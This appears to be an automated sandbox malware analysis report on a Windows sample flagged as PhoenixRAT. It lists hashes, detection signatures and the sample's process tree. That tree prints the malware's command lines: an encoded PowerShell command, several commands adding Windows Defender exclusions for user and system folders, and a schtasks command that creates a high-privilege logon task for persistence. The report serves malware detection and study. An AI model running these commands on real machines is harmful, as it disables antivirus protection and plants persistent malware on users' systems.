Edit tour
Windows
Analysis Report
dbsJ8HZXYa
Overview
General Information
| Sample Name: | dbsJ8HZXYa (renamed file extension from none to exe) |
| Analysis ID: | 728895 |
| MD5: | 73f075adda1fe81dea4022f4e06fb64a |
| SHA1: | ca241492da03a4d86fd43a5a076e22ac6949505c |
| SHA256: | 77cb17ef2f4f282f39838e7430bf040c3356e59ae8f13cbd4e670712e9f44a4e |
| Infos: |  |
 | |
Detection
PhoenixRAT
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Yara detected PhoenixRAT
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Found strings related to Crypto-Mining
Protects its processes via BreakOnTermination flag
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Potential dropper URLs found in powershell memory
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
dbsJ8HZXYa.exe (PID: 5760 cmdline: C:\Users\u ser\Deskto p\dbsJ8HZX Ya.exe MD5: 73F075ADDA1FE81DEA4022F4E06FB64A) 
powershell.exe (PID: 4020 cmdline: C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "PAAj AGwAeAB1AC MAPgBBAGQA ZAAtAE0AcA BQAHIAZQBm AGUAcgBlAG 4AYwBlACAA PAAjAHUAcw BiACMAPgAg AC0ARQB4AG MAbAB1AHMA aQBvAG4AUA BhAHQAaAAg AEAAKAAkAG UAbgB2ADoA VQBzAGUAcg BQAHIAbwBm AGkAbABlAC wAJABlAG4A dgA6AFMAeQ BzAHQAZQBt AEQAcgBpAH YAZQApACAA PAAjAGgAYg BzACMAPgAg AC0ARgBvAH IAYwBlACAA PAAjAGQAdA BkACMAPgA= MD5: 95000560239032BC68B4C2FDFCDEF913) 
conhost.exe (PID: 6016 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
Wzhtwkrl.exe (PID: 5156 cmdline: "C:\Users\ user\AppDa ta\Local\T emp\Wzhtwk rl.exe" MD5: 12C686D78A0C45F37FD17B743A0609F0) - PhoenixClientbaluci.exe (PID: 1212 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Phoeni xClientbal uci.exe" MD5: D6DDA9CB85261B5FDC12EB22C5D3E6DA) - cmd.exe (PID: 3600 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell -Comma nd Add-MpP reference -Exclusion Path '%APP DATA%' & p owershell -Command A dd-MpPrefe rence -Exc lusionPath '%TMP%' & powershel l -Command Add-MpPre ference -E xclusionPa th '%Syste mRoot%' & powershell -Command Add-MpPref erence -Ex clusionPat h '%UserPr ofile%' MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 612 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 3080 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\User s\user\App Data\Roami ng' MD5: 95000560239032BC68B4C2FDFCDEF913) - powershell.exe (PID: 6132 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\User s\user\App Data\Local \Temp' MD5: 95000560239032BC68B4C2FDFCDEF913) - powershell.exe (PID: 2680 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\Wind ows' MD5: 95000560239032BC68B4C2FDFCDEF913) - powershell.exe (PID: 648 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\User s\user' MD5: 95000560239032BC68B4C2FDFCDEF913) - cmd.exe (PID: 4968 cmdline:
"C:\Window s\System32 \cmd.exe" /c schtask s /create /f /sc onl ogon /rl h ighest /tn "System" /tr '"C:\U sers\user\ AppData\Ro aming\Syst em\System. exe"' & ex it MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5468 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 1708 cmdline:
schtasks / create /f /sc onlogo n /rl high est /tn "S ystem" /tr '"C:\User s\user\App Data\Roami ng\System\ System.exe "' MD5: 838D346D1D28F00783B7A6C6BD03A0DA) - cmd.exe (PID: 1244 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\tmpC 0DF.tmp.ba t"" MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 2424 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - timeout.exe (PID: 5116 cmdline:
timeout 3 MD5: EB9A65078396FB5D4E3813BB9198CB18)